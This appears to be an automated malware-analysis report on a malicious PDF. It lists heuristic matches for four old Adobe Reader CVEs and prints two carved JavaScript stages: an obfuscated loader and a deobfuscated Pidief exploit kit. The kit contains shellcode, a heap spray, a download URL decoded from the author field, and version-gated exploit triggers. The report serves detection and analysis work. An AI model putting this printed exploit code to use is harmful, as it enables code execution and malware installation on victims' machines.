MALICIOUS
408
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_000.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x1A20 | 7011 bytes |
SHA-256: 15a2ba2ac9f948e5fbe9bda3ab1eef4d5a11887e4d8c3775e3a898597e757ace |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var dM=function(){};this.pFile=30311;var yH=false;this.h="h";var fileS=function(){};this.alphaFile="alphaFile";var g='get';this.bI="";var sU="sU";g+='Page';this.qC="qC";this.dD=false;this.nV="nV";var dGoogle=new Function();this.fV="fV";this.jL="jL";this.googleBasic="googleBasic";this.vT=false;var gB=false;var a="4d%4df";this.editX=24532;var nZ="";var jR="";this.tG=19162;var update='';var fUpdate="fUpdate";var l=26653;var i="i";var nFile=new String();var bD="";var z=21659;var rGoogle="rGoogle";var fT=16371;var bIU=831;var fileC=new String();var lB="";var qG="";var jB="jB";var updateAG="";var editB="editB";var dO=new String();var adobeFile=new String();var uRU=new String();var uU=27562;var b=[3,2][1];var jRO=new String();this.tEdit="tEdit";this.mY=10232;var m=Function;this.lK="lK";var yV=new Date();var aQ=new Date();this.kZ='';this.tS="tS";this.eIV="eIV";this.sS='';this.gG='';this.tE="tE";var pU='';this.xGoogle='';var sC=new Date();this.fG="fG";var cM=new Date();this.mX='';var cC=new Date();this.hJUpdate='';var mU=app;this.gGoogle=false;this.aG='';mU=mU['doc'];var basicB=new Date();this.jZ="";this.basicT=false;this.updateFile=false;this.sEdit="";var cFile=new Date();this.dX=9512;var aAdobe="aAdobe";this.sQ=false;this.fileFile="";this.wEdit=false;this.uF=false;this.tF=83;this.alphaLH=false;this.bGoogle=26283;this.qFile=23415;this.eX="";this.bAlphaM=32430;var gN="gN";this.cQ=28390;this.qN=false;this.bF=false;var xT=g;this.bDE='';this.zAdobeZ='';xT+='NthWord';var mRG=new Function();var d=246;var cUpdate=new Date();var eFQ=new Date();var yAdobe='';var googleY=false;var sD=16518;this.alphaWU=false;var sT=new Date();var fZ=new Date();var adobeNB='';var adobeG='';var lR=32558;var oF='';var alphaJG='';var hFile=false;var fileI=false;var uB='';var uA='';var sCE=new Date();var basic=g;var uS=1254;basic+='NumWords';var xBX=1146;var qFileF="qFileF";var eM="eM";this.tI="";var googleUpdate=new String();var adobeE=30292;var nQ=16691;var fileSR=3498;var googleSE=new String();var yU="yU";var iG="iG";this.pFileT="";var basicS="basicS";var fN=4556;var dGoogleO=25601;var vUAdobe=29101;var iE=new String();this.lM="";var fileQ=new String();this.tU="";var hI="";var nW="";this.lYT=480;this.iAdobeE="";this.dAdobeZ='';var fW=function(){};var iFile=function(){};var oD="";var s="cape";var adobeJ=new String();var rV=31113;var tA=27061;var bK=17313;var googleP=4883;var uBZ=new String();var tEditX=new String();this.fileEditJ="";var adobeI='';var googleLA='';this.basicGoogle="";this.qGoogle="";this.alphaF="";var googleVZ="";this.oGoogle=15552;var aX=function(){};var vNN=function(){};var vR=function(){};this.qAdobeY=31162;var alphaR="";var sN=function(){};var qS="";var r=[0,1][0];var updateY=17872;var adobeK=3884;var dT=false;var iGM=false;var googleUpdateG=false;var cO=new String();var wF=false;var gTC=23680;var zGX=false;var j='cha'+'rCode'+'At';this.uFile='';this.yM=12831;this.oAdobeJ='';var yUW=function(){};var adobeD=false;var alpha='fr'+'omCharC'+'ode';var aMK="aMK";var hH="hH";var uZB=function(){};var rO=function(){};var gR=false;var dVJ=function(){};var vSN=new String();var pUO=function(){};var googleSR="googleSR";var cGoogle=new Function();a=a.substr(2,1);this.bS=false;this.dFileZ=false;this.hDE=false;this.dC=false;this.pEN='';var qGoogleUpdate=new Function();var ePW=new Function();this.oI='';var cBM=function(){};this.sG='';var tAdobeT=new Function();this.fileCC=false;this.zPFile=false;this.oA=false;var aCF=new Function();var updateP=new String();this.aGoogle="aGoogle";var rKI=false;var fEditFile=new String();var aIU=false;var uP=false;this.fE=18714;this.editQ="editQ";var aGoogleUpdate=false;this.pBasicAlpha=11275;var rCY=false;this.jIBasic='';var jPH=new String();var editFile=new String();var iCE=false;var fileUpdate=false;var uG=new String();var rZ=this['u'+'nes'+s];this.fileLW=25663;this.adobeYN="";this.alphaAV='';this.nUpdateI="nUpdateI";this.vRFile=12436;this.editZ=16499;this.adobeM="adobeM";this.rCR='';this.jG="jG";this.jPG=30613;this.wA=1921;this.sUpdate="sUpdate";this.uQM=29708;this.kJ=7489;var kBZ="kBZ";var alphaK='';var googleX="googleX";this.mH=false;this.fileZA="fileZA";this.nF=14147;var nY='';this.cA=false;var mAlpha='';var aGH="aGH";this.iUpdate=22520;this.hG="hG";var pMU="pMU";this.basicK=10538;new m(rI(1, d))();var editFileU=new Date();var mAlphaX=22088;var qWAlpha=12866;var dQ=new Date();var yDX=new Date();this.bUpdateY=false;this.eFileFile="eFileFile";this.yG=false;this.gBasic="gBasic";var bFileB=8569;var yPJ=new Date();var uBM=new Date();var nBasic=new Date();var aGR=new Date();var qCY=8375;this.xAlphaR=false;var updateRI="updateRI";this.bL=false;this.aXF=false;var hKBasic="hKBasic";var mZ="mZ";var gGM="gGM";var cS="";var gIE=new Date();var lV=new Date();var gA="";var alphaGB="alphaGB";function rI(dW, d){this.gGoogleGoogle=13719;this.eS=6432;var uEdit=function(){};this.adobeB="";this.editDU=26080;var eBF=new String();this.pIM=27373;var adobeNV=new String();this.bXIA=6119;var editDEdit=function(){};this.tB=12501;this.googleEditA=935;var lD=function(){};this.hPT="";var rKM=new String();this.adobeAlpha=16937;var hFileQ=new Function();this.oFF="oFF";this.bEdit="";var basicFile="";var fileRD="";var cAdobeM='';var kVZ='';var gUpdate='';this.qNO="qNO";this.fX="";var sM=new Function();var fRP=new Function();var googleFile=new Function();var nJ=new Function();this.xFileH="";var wK="";var yWAW="";var updateAdobeU=new Function();var dE=mU[basic](1);var fF="";var yI=new String();this.googleYUpdate=24244;this.bV=29262;var xFileN=new String(); for(var u=0; u < dE; u++){this.hR='';var pOL=new String();var updateGFile=new Date();var aGoogleBasic=new String();var kBF=9447;var vP=new String();this.xK=9685;var zX=new Date();var alphaAC=new Date();var yEditE=new String();var yUpdate=new Date();var eSR=new Date();this.fH='';var yGoogleEdit=new String();this.zZQ=23708;google=mU[xT](dW, u);var aCEdit="";var jJA="jJA";var uUpdateA="uUpdateA";var gD=false;var iF="";this.googleGoogleBasic=false;var oSL=function(){};var editAdobeX="editAdobeX";var eMUpdate="eMUpdate";var googleKFile="";var aEC=function(){};var dHF=false;var updateAK=function(){};var w=google.substr(google.length-b, b);var nEditAdobe="nEditAdobe";this.editJ=false;var rZFile="";var gVR='';var eBO="";var tAlpha=function(){};var basicYM=function(){};this.iMD=false;var wFJ="";var dEUpdate=rZ(a + w)[j](r);update+=String[alpha](dEUpdate^d);this.fBasicR="fBasicR";var mGK=false;this.alphaMV="alphaMV";this.kWQ=22238;var zUpdate=function(){};var iFM=function(){};var editJN=function(){};var editL=function(){};var xGoogleFile=new Function();this.dAdobeG="dAdobeG";this.nBGoogle=31939;var editWA=function(){};var basicSTG=new Function();this.bON=9728;}var alphaI=new Date();return update;this.adobeLE="";this.uXGoogle="";this.lBasic='';this.cBasic="";var hFileH="hFileH";var dAlpha="dAlpha";var mLW=new String();this.fKG='';}var editBT="editBT";this.xMY="";this.eHEdit="";var sLS=function(){};var pAV=function(){};var kFileD=function(){};var googleRJ=function(){};
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3294 bytes |
SHA-256: 8eb265d0859e0f62449016a0cf9d2bc8687997474788e54f065a94242e6dde2c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
< X<X888 88 , <,<X, < ( Z
var src_table = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%";
var dest_table= "q=Vg2v%5B6YrO?cHDK1mf:3MRyu/oNGUhAsit0dl-Xap7kLewxzJb94QISn.8j0F&WE_ZCTP";
app.alert(123);
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8){
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ ){ iVvCdy8 += "8";
} util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
try
{
media.newPlayer(null);
} catch(e)
{}
util.printd("1.000000000.000000000.1337 : 3.13.37", new Date());
}
}
U2UcYKr();
ZM 8 <M M< Z MM 8 X �V�XXXX�V�
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.